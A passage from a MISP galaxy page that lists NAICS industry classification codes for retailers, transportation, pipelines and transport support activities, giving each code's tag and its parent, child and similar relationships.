  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45991" with estimative-language:likelihood-probability="likely"

45992

Art Dealers

The tag is: misp-galaxy:naics="45992"

45992 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459920" with estimative-language:likelihood-probability="likely"

459920

Art Dealers

The tag is: misp-galaxy:naics="459920"

459920 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45992" with estimative-language:likelihood-probability="likely"

45993

Manufactured (Mobile) Home Dealers

The tag is: misp-galaxy:naics="45993"

45993 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459930" with estimative-language:likelihood-probability="likely"

459930

Manufactured (Mobile) Home Dealers

The tag is: misp-galaxy:naics="459930"

459930 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45993" with estimative-language:likelihood-probability="likely"

45999

All Other Miscellaneous Retailers

The tag is: misp-galaxy:naics="45999"

45999 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

459991

Tobacco, Electronic Cigarette, and Other Smoking Supplies Retailers

The tag is: misp-galaxy:naics="459991"

459991 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

459999

All Other Miscellaneous Retailers

The tag is: misp-galaxy:naics="459999"

459999 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

48-49

Transportation and Warehousing

The tag is: misp-galaxy:naics="48-49"

481

Air Transportation

The tag is: misp-galaxy:naics="481"

481 has relationships with:

  • parent-of: misp-galaxy:naics="4811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4812" with estimative-language:likelihood-probability="likely"

4811

Scheduled Air Transportation

The tag is: misp-galaxy:naics="4811"

4811 has relationships with:

  • child-of: misp-galaxy:naics="481" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="481111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="481112" with estimative-language:likelihood-probability="likely"

48111

Scheduled Air Transportation

The tag is: misp-galaxy:naics="48111"

48111 has relationships with:

  • child-of: misp-galaxy:naics="4811" with estimative-language:likelihood-probability="likely"

481111

Scheduled Passenger Air Transportation

The tag is: misp-galaxy:naics="481111"

481111 has relationships with:

  • child-of: misp-galaxy:naics="4811" with estimative-language:likelihood-probability="likely"

481112

Scheduled Freight Air Transportation

The tag is: misp-galaxy:naics="481112"

481112 has relationships with:

  • child-of: misp-galaxy:naics="4811" with estimative-language:likelihood-probability="likely"

4812

Nonscheduled Air Transportation

The tag is: misp-galaxy:naics="4812"

4812 has relationships with:

  • child-of: misp-galaxy:naics="481" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="481211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="481212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="481219" with estimative-language:likelihood-probability="likely"

48121

Nonscheduled Air Transportation

The tag is: misp-galaxy:naics="48121"

48121 has relationships with:

  • child-of: misp-galaxy:naics="4812" with estimative-language:likelihood-probability="likely"

481211

Nonscheduled Chartered Passenger Air Transportation

The tag is: misp-galaxy:naics="481211"

481211 has relationships with:

  • child-of: misp-galaxy:naics="4812" with estimative-language:likelihood-probability="likely"

481212

Nonscheduled Chartered Freight Air Transportation

The tag is: misp-galaxy:naics="481212"

481212 has relationships with:

  • child-of: misp-galaxy:naics="4812" with estimative-language:likelihood-probability="likely"

481219

Other Nonscheduled Air Transportation

The tag is: misp-galaxy:naics="481219"

481219 has relationships with:

  • child-of: misp-galaxy:naics="4812" with estimative-language:likelihood-probability="likely"

482

Rail Transportation

The tag is: misp-galaxy:naics="482"

482 has relationships with:

  • parent-of: misp-galaxy:naics="4821" with estimative-language:likelihood-probability="likely"

4821

Rail Transportation

The tag is: misp-galaxy:naics="4821"

4821 has relationships with:

  • child-of: misp-galaxy:naics="482" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="482111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="482112" with estimative-language:likelihood-probability="likely"

48211

Rail Transportation

The tag is: misp-galaxy:naics="48211"

48211 has relationships with:

  • child-of: misp-galaxy:naics="4821" with estimative-language:likelihood-probability="likely"

482111

Line-Haul Railroads

The tag is: misp-galaxy:naics="482111"

482111 has relationships with:

  • child-of: misp-galaxy:naics="4821" with estimative-language:likelihood-probability="likely"

482112

Short Line Railroads

The tag is: misp-galaxy:naics="482112"

482112 has relationships with:

  • child-of: misp-galaxy:naics="4821" with estimative-language:likelihood-probability="likely"

483

Water Transportation

The tag is: misp-galaxy:naics="483"

483 has relationships with:

  • parent-of: misp-galaxy:naics="4831" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4832" with estimative-language:likelihood-probability="likely"

4831

Deep Sea, Coastal, and Great Lakes Water Transportation

The tag is: misp-galaxy:naics="4831"

4831 has relationships with:

  • child-of: misp-galaxy:naics="483" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="483111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="483112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="483113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="483114" with estimative-language:likelihood-probability="likely"

48311

Deep Sea, Coastal, and Great Lakes Water Transportation

The tag is: misp-galaxy:naics="48311"

48311 has relationships with:

  • child-of: misp-galaxy:naics="4831" with estimative-language:likelihood-probability="likely"

483111

Deep Sea Freight Transportation

The tag is: misp-galaxy:naics="483111"

483111 has relationships with:

  • child-of: misp-galaxy:naics="4831" with estimative-language:likelihood-probability="likely"

483112

Deep Sea Passenger Transportation

The tag is: misp-galaxy:naics="483112"

483112 has relationships with:

  • child-of: misp-galaxy:naics="4831" with estimative-language:likelihood-probability="likely"

483113

Coastal and Great Lakes Freight Transportation

The tag is: misp-galaxy:naics="483113"

483113 has relationships with:

  • child-of: misp-galaxy:naics="4831" with estimative-language:likelihood-probability="likely"

483114

Coastal and Great Lakes Passenger Transportation

The tag is: misp-galaxy:naics="483114"

483114 has relationships with:

  • child-of: misp-galaxy:naics="4831" with estimative-language:likelihood-probability="likely"

4832

Inland Water Transportation

The tag is: misp-galaxy:naics="4832"

4832 has relationships with:

  • child-of: misp-galaxy:naics="483" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="483211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="483212" with estimative-language:likelihood-probability="likely"

48321

Inland Water Transportation

The tag is: misp-galaxy:naics="48321"

48321 has relationships with:

  • child-of: misp-galaxy:naics="4832" with estimative-language:likelihood-probability="likely"

483211

Inland Water Freight Transportation

The tag is: misp-galaxy:naics="483211"

483211 has relationships with:

  • child-of: misp-galaxy:naics="4832" with estimative-language:likelihood-probability="likely"

483212

Inland Water Passenger Transportation

The tag is: misp-galaxy:naics="483212"

483212 has relationships with:

  • child-of: misp-galaxy:naics="4832" with estimative-language:likelihood-probability="likely"

484

Truck Transportation

The tag is: misp-galaxy:naics="484"

484 has relationships with:

  • parent-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4842" with estimative-language:likelihood-probability="likely"

4841

General Freight Trucking

The tag is: misp-galaxy:naics="4841"

4841 has relationships with:

  • child-of: misp-galaxy:naics="484" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="484110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="484121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="484122" with estimative-language:likelihood-probability="likely"

48411

General Freight Trucking, Local

The tag is: misp-galaxy:naics="48411"

48411 has relationships with:

  • child-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="484110" with estimative-language:likelihood-probability="likely"

484110

General Freight Trucking, Local

The tag is: misp-galaxy:naics="484110"

484110 has relationships with:

  • child-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48411" with estimative-language:likelihood-probability="likely"

48412

General Freight Trucking, Long-Distance

The tag is: misp-galaxy:naics="48412"

48412 has relationships with:

  • child-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"

484121

General Freight Trucking, Long-Distance, Truckload

The tag is: misp-galaxy:naics="484121"

484121 has relationships with:

  • child-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"

484122

General Freight Trucking, Long-Distance, Less Than Truckload

The tag is: misp-galaxy:naics="484122"

484122 has relationships with:

  • child-of: misp-galaxy:naics="4841" with estimative-language:likelihood-probability="likely"

4842

Specialized Freight Trucking

The tag is: misp-galaxy:naics="4842"

4842 has relationships with:

  • child-of: misp-galaxy:naics="484" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="484210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48422" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="484220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="484230" with estimative-language:likelihood-probability="likely"

48421

Used Household and Office Goods Moving

The tag is: misp-galaxy:naics="48421"

48421 has relationships with:

  • child-of: misp-galaxy:naics="4842" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="484210" with estimative-language:likelihood-probability="likely"

484210

Used Household and Office Goods Moving

The tag is: misp-galaxy:naics="484210"

484210 has relationships with:

  • child-of: misp-galaxy:naics="4842" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48421" with estimative-language:likelihood-probability="likely"

48422

Specialized Freight (except Used Goods) Trucking, Local

The tag is: misp-galaxy:naics="48422"

48422 has relationships with:

  • child-of: misp-galaxy:naics="4842" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="484220" with estimative-language:likelihood-probability="likely"

484220

Specialized Freight (except Used Goods) Trucking, Local

The tag is: misp-galaxy:naics="484220"

484220 has relationships with:

  • child-of: misp-galaxy:naics="4842" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48422" with estimative-language:likelihood-probability="likely"

48423

Specialized Freight (except Used Goods) Trucking, Long-Distance

The tag is: misp-galaxy:naics="48423"

48423 has relationships with:

  • child-of: misp-galaxy:naics="4842" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="484230" with estimative-language:likelihood-probability="likely"

484230

Specialized Freight (except Used Goods) Trucking, Long-Distance

The tag is: misp-galaxy:naics="484230"

484230 has relationships with:

  • child-of: misp-galaxy:naics="4842" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48423" with estimative-language:likelihood-probability="likely"

485

Transit and Ground Passenger Transportation

The tag is: misp-galaxy:naics="485"

485 has relationships with:

  • parent-of: misp-galaxy:naics="4851" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4852" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4853" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4854" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4855" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4859" with estimative-language:likelihood-probability="likely"

4851

Urban Transit Systems

The tag is: misp-galaxy:naics="4851"

4851 has relationships with:

  • child-of: misp-galaxy:naics="485" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485119" with estimative-language:likelihood-probability="likely"

48511

Urban Transit Systems

The tag is: misp-galaxy:naics="48511"

48511 has relationships with:

  • child-of: misp-galaxy:naics="4851" with estimative-language:likelihood-probability="likely"

485111

Mixed Mode Transit Systems

The tag is: misp-galaxy:naics="485111"

485111 has relationships with:

  • child-of: misp-galaxy:naics="4851" with estimative-language:likelihood-probability="likely"

485112

Commuter Rail Systems

The tag is: misp-galaxy:naics="485112"

485112 has relationships with:

  • child-of: misp-galaxy:naics="4851" with estimative-language:likelihood-probability="likely"

485113

Bus and Other Motor Vehicle Transit Systems

The tag is: misp-galaxy:naics="485113"

485113 has relationships with:

  • child-of: misp-galaxy:naics="4851" with estimative-language:likelihood-probability="likely"

485119

Other Urban Transit Systems

The tag is: misp-galaxy:naics="485119"

485119 has relationships with:

  • child-of: misp-galaxy:naics="4851" with estimative-language:likelihood-probability="likely"

4852

Interurban and Rural Bus Transportation

The tag is: misp-galaxy:naics="4852"

4852 has relationships with:

  • child-of: misp-galaxy:naics="485" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485210" with estimative-language:likelihood-probability="likely"

48521

Interurban and Rural Bus Transportation

The tag is: misp-galaxy:naics="48521"

48521 has relationships with:

  • child-of: misp-galaxy:naics="4852" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="485210" with estimative-language:likelihood-probability="likely"

485210

Interurban and Rural Bus Transportation

The tag is: misp-galaxy:naics="485210"

485210 has relationships with:

  • child-of: misp-galaxy:naics="4852" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48521" with estimative-language:likelihood-probability="likely"

4853

Taxi and Limousine Service

The tag is: misp-galaxy:naics="4853"

4853 has relationships with:

  • child-of: misp-galaxy:naics="485" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485320" with estimative-language:likelihood-probability="likely"

48531

Taxi and Ridesharing Services

The tag is: misp-galaxy:naics="48531"

48531 has relationships with:

  • child-of: misp-galaxy:naics="4853" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="485310" with estimative-language:likelihood-probability="likely"

485310

Taxi and Ridesharing Services

The tag is: misp-galaxy:naics="485310"

485310 has relationships with:

  • child-of: misp-galaxy:naics="4853" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48531" with estimative-language:likelihood-probability="likely"

48532

Limousine Service

The tag is: misp-galaxy:naics="48532"

48532 has relationships with:

  • child-of: misp-galaxy:naics="4853" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="485320" with estimative-language:likelihood-probability="likely"

485320

Limousine Service

The tag is: misp-galaxy:naics="485320"

485320 has relationships with:

  • child-of: misp-galaxy:naics="4853" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48532" with estimative-language:likelihood-probability="likely"

4854

School and Employee Bus Transportation

The tag is: misp-galaxy:naics="4854"

4854 has relationships with:

  • child-of: misp-galaxy:naics="485" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485410" with estimative-language:likelihood-probability="likely"

48541

School and Employee Bus Transportation

The tag is: misp-galaxy:naics="48541"

48541 has relationships with:

  • child-of: misp-galaxy:naics="4854" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="485410" with estimative-language:likelihood-probability="likely"

485410

School and Employee Bus Transportation

The tag is: misp-galaxy:naics="485410"

485410 has relationships with:

  • child-of: misp-galaxy:naics="4854" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48541" with estimative-language:likelihood-probability="likely"

4855

Charter Bus Industry

The tag is: misp-galaxy:naics="4855"

4855 has relationships with:

  • child-of: misp-galaxy:naics="485" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48551" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485510" with estimative-language:likelihood-probability="likely"

48551

Charter Bus Industry

The tag is: misp-galaxy:naics="48551"

48551 has relationships with:

  • child-of: misp-galaxy:naics="4855" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="485510" with estimative-language:likelihood-probability="likely"

485510

Charter Bus Industry

The tag is: misp-galaxy:naics="485510"

485510 has relationships with:

  • child-of: misp-galaxy:naics="4855" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48551" with estimative-language:likelihood-probability="likely"

4859

Other Transit and Ground Passenger Transportation

The tag is: misp-galaxy:naics="4859"

4859 has relationships with:

  • child-of: misp-galaxy:naics="485" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48599" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="485999" with estimative-language:likelihood-probability="likely"

48599

Other Transit and Ground Passenger Transportation

The tag is: misp-galaxy:naics="48599"

48599 has relationships with:

  • child-of: misp-galaxy:naics="4859" with estimative-language:likelihood-probability="likely"

485991

Special Needs Transportation

The tag is: misp-galaxy:naics="485991"

485991 has relationships with:

  • child-of: misp-galaxy:naics="4859" with estimative-language:likelihood-probability="likely"

485999

All Other Transit and Ground Passenger Transportation

The tag is: misp-galaxy:naics="485999"

485999 has relationships with:

  • child-of: misp-galaxy:naics="4859" with estimative-language:likelihood-probability="likely"

486

Pipeline Transportation

The tag is: misp-galaxy:naics="486"

486 has relationships with:

  • parent-of: misp-galaxy:naics="4861" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4862" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4869" with estimative-language:likelihood-probability="likely"

4861

Pipeline Transportation of Crude Oil

The tag is: misp-galaxy:naics="4861"

4861 has relationships with:

  • child-of: misp-galaxy:naics="486" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="486110" with estimative-language:likelihood-probability="likely"

48611

Pipeline Transportation of Crude Oil

The tag is: misp-galaxy:naics="48611"

48611 has relationships with:

  • child-of: misp-galaxy:naics="4861" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="486110" with estimative-language:likelihood-probability="likely"

486110

Pipeline Transportation of Crude Oil

The tag is: misp-galaxy:naics="486110"

486110 has relationships with:

  • child-of: misp-galaxy:naics="4861" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48611" with estimative-language:likelihood-probability="likely"

4862

Pipeline Transportation of Natural Gas

The tag is: misp-galaxy:naics="4862"

4862 has relationships with:

  • child-of: misp-galaxy:naics="486" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="486210" with estimative-language:likelihood-probability="likely"

48621

Pipeline Transportation of Natural Gas

The tag is: misp-galaxy:naics="48621"

48621 has relationships with:

  • child-of: misp-galaxy:naics="4862" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="486210" with estimative-language:likelihood-probability="likely"

486210

Pipeline Transportation of Natural Gas

The tag is: misp-galaxy:naics="486210"

486210 has relationships with:

  • child-of: misp-galaxy:naics="4862" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48621" with estimative-language:likelihood-probability="likely"

4869

Other Pipeline Transportation

The tag is: misp-galaxy:naics="4869"

4869 has relationships with:

  • child-of: misp-galaxy:naics="486" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48691" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="486910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48699" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="486990" with estimative-language:likelihood-probability="likely"

48691

Pipeline Transportation of Refined Petroleum Products

The tag is: misp-galaxy:naics="48691"

48691 has relationships with:

  • child-of: misp-galaxy:naics="4869" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="486910" with estimative-language:likelihood-probability="likely"

486910

Pipeline Transportation of Refined Petroleum Products

The tag is: misp-galaxy:naics="486910"

486910 has relationships with:

  • child-of: misp-galaxy:naics="4869" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48691" with estimative-language:likelihood-probability="likely"

48699

All Other Pipeline Transportation

The tag is: misp-galaxy:naics="48699"

48699 has relationships with:

  • child-of: misp-galaxy:naics="4869" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="486990" with estimative-language:likelihood-probability="likely"

486990

All Other Pipeline Transportation

The tag is: misp-galaxy:naics="486990"

486990 has relationships with:

  • child-of: misp-galaxy:naics="4869" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48699" with estimative-language:likelihood-probability="likely"

487

Scenic and Sightseeing Transportation

The tag is: misp-galaxy:naics="487"

487 has relationships with:

  • parent-of: misp-galaxy:naics="4871" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4872" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4879" with estimative-language:likelihood-probability="likely"

4871

Scenic and Sightseeing Transportation, Land

The tag is: misp-galaxy:naics="4871"

4871 has relationships with:

  • child-of: misp-galaxy:naics="487" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="487110" with estimative-language:likelihood-probability="likely"

48711

Scenic and Sightseeing Transportation, Land

The tag is: misp-galaxy:naics="48711"

48711 has relationships with:

  • child-of: misp-galaxy:naics="4871" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="487110" with estimative-language:likelihood-probability="likely"

487110

Scenic and Sightseeing Transportation, Land

The tag is: misp-galaxy:naics="487110"

487110 has relationships with:

  • child-of: misp-galaxy:naics="4871" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48711" with estimative-language:likelihood-probability="likely"

4872

Scenic and Sightseeing Transportation, Water

The tag is: misp-galaxy:naics="4872"

4872 has relationships with:

  • child-of: misp-galaxy:naics="487" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="487210" with estimative-language:likelihood-probability="likely"

48721

Scenic and Sightseeing Transportation, Water

The tag is: misp-galaxy:naics="48721"

48721 has relationships with:

  • child-of: misp-galaxy:naics="4872" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="487210" with estimative-language:likelihood-probability="likely"

487210

Scenic and Sightseeing Transportation, Water

The tag is: misp-galaxy:naics="487210"

487210 has relationships with:

  • child-of: misp-galaxy:naics="4872" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48721" with estimative-language:likelihood-probability="likely"

4879

Scenic and Sightseeing Transportation, Other

The tag is: misp-galaxy:naics="4879"

4879 has relationships with:

  • child-of: misp-galaxy:naics="487" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48799" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="487990" with estimative-language:likelihood-probability="likely"

48799

Scenic and Sightseeing Transportation, Other

The tag is: misp-galaxy:naics="48799"

48799 has relationships with:

  • child-of: misp-galaxy:naics="4879" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="487990" with estimative-language:likelihood-probability="likely"

487990

Scenic and Sightseeing Transportation, Other

The tag is: misp-galaxy:naics="487990"

487990 has relationships with:

  • child-of: misp-galaxy:naics="4879" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48799" with estimative-language:likelihood-probability="likely"

488

Support Activities for Transportation

The tag is: misp-galaxy:naics="488"

488 has relationships with:

  • parent-of: misp-galaxy:naics="4881" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4882" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4884" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4885" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4889" with estimative-language:likelihood-probability="likely"

4881

Support Activities for Air Transportation

The tag is: misp-galaxy:naics="4881"

4881 has relationships with:

  • child-of: misp-galaxy:naics="488" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48819" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488190" with estimative-language:likelihood-probability="likely"

48811

Airport Operations

The tag is: misp-galaxy:naics="48811"

48811 has relationships with:

  • child-of: misp-galaxy:naics="4881" with estimative-language:likelihood-probability="likely"

488111

Air Traffic Control

The tag is: misp-galaxy:naics="488111"

488111 has relationships with:

  • child-of: misp-galaxy:naics="4881" with estimative-language:likelihood-probability="likely"

488119

Other Airport Operations

The tag is: misp-galaxy:naics="488119"

488119 has relationships with:

  • child-of: misp-galaxy:naics="4881" with estimative-language:likelihood-probability="likely"

48819

Other Support Activities for Air Transportation

The tag is: misp-galaxy:naics="48819"

48819 has relationships with:

  • child-of: misp-galaxy:naics="4881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488190" with estimative-language:likelihood-probability="likely"

488190

Other Support Activities for Air Transportation

The tag is: misp-galaxy:naics="488190"

488190 has relationships with:

  • child-of: misp-galaxy:naics="4881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48819" with estimative-language:likelihood-probability="likely"

4882

Support Activities for Rail Transportation

The tag is: misp-galaxy:naics="4882"

4882 has relationships with:

  • child-of: misp-galaxy:naics="488" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48821" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488210" with estimative-language:likelihood-probability="likely"

48821

Support Activities for Rail Transportation

The tag is: misp-galaxy:naics="48821"

48821 has relationships with:

  • child-of: misp-galaxy:naics="4882" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488210" with estimative-language:likelihood-probability="likely"

488210

Support Activities for Rail Transportation

The tag is: misp-galaxy:naics="488210"

488210 has relationships with:

  • child-of: misp-galaxy:naics="4882" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48821" with estimative-language:likelihood-probability="likely"

4883

Support Activities for Water Transportation

The tag is: misp-galaxy:naics="4883"

4883 has relationships with:

  • child-of: misp-galaxy:naics="488" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48831" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48832" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48833" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48839" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488390" with estimative-language:likelihood-probability="likely"

48831

Port and Harbor Operations

The tag is: misp-galaxy:naics="48831"

48831 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488310" with estimative-language:likelihood-probability="likely"

488310

Port and Harbor Operations

The tag is: misp-galaxy:naics="488310"

488310 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48831" with estimative-language:likelihood-probability="likely"

48832

Marine Cargo Handling

The tag is: misp-galaxy:naics="48832"

48832 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488320" with estimative-language:likelihood-probability="likely"

488320

Marine Cargo Handling

The tag is: misp-galaxy:naics="488320"

488320 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48832" with estimative-language:likelihood-probability="likely"

48833

Navigational Services to Shipping

The tag is: misp-galaxy:naics="48833"

48833 has relationships with:

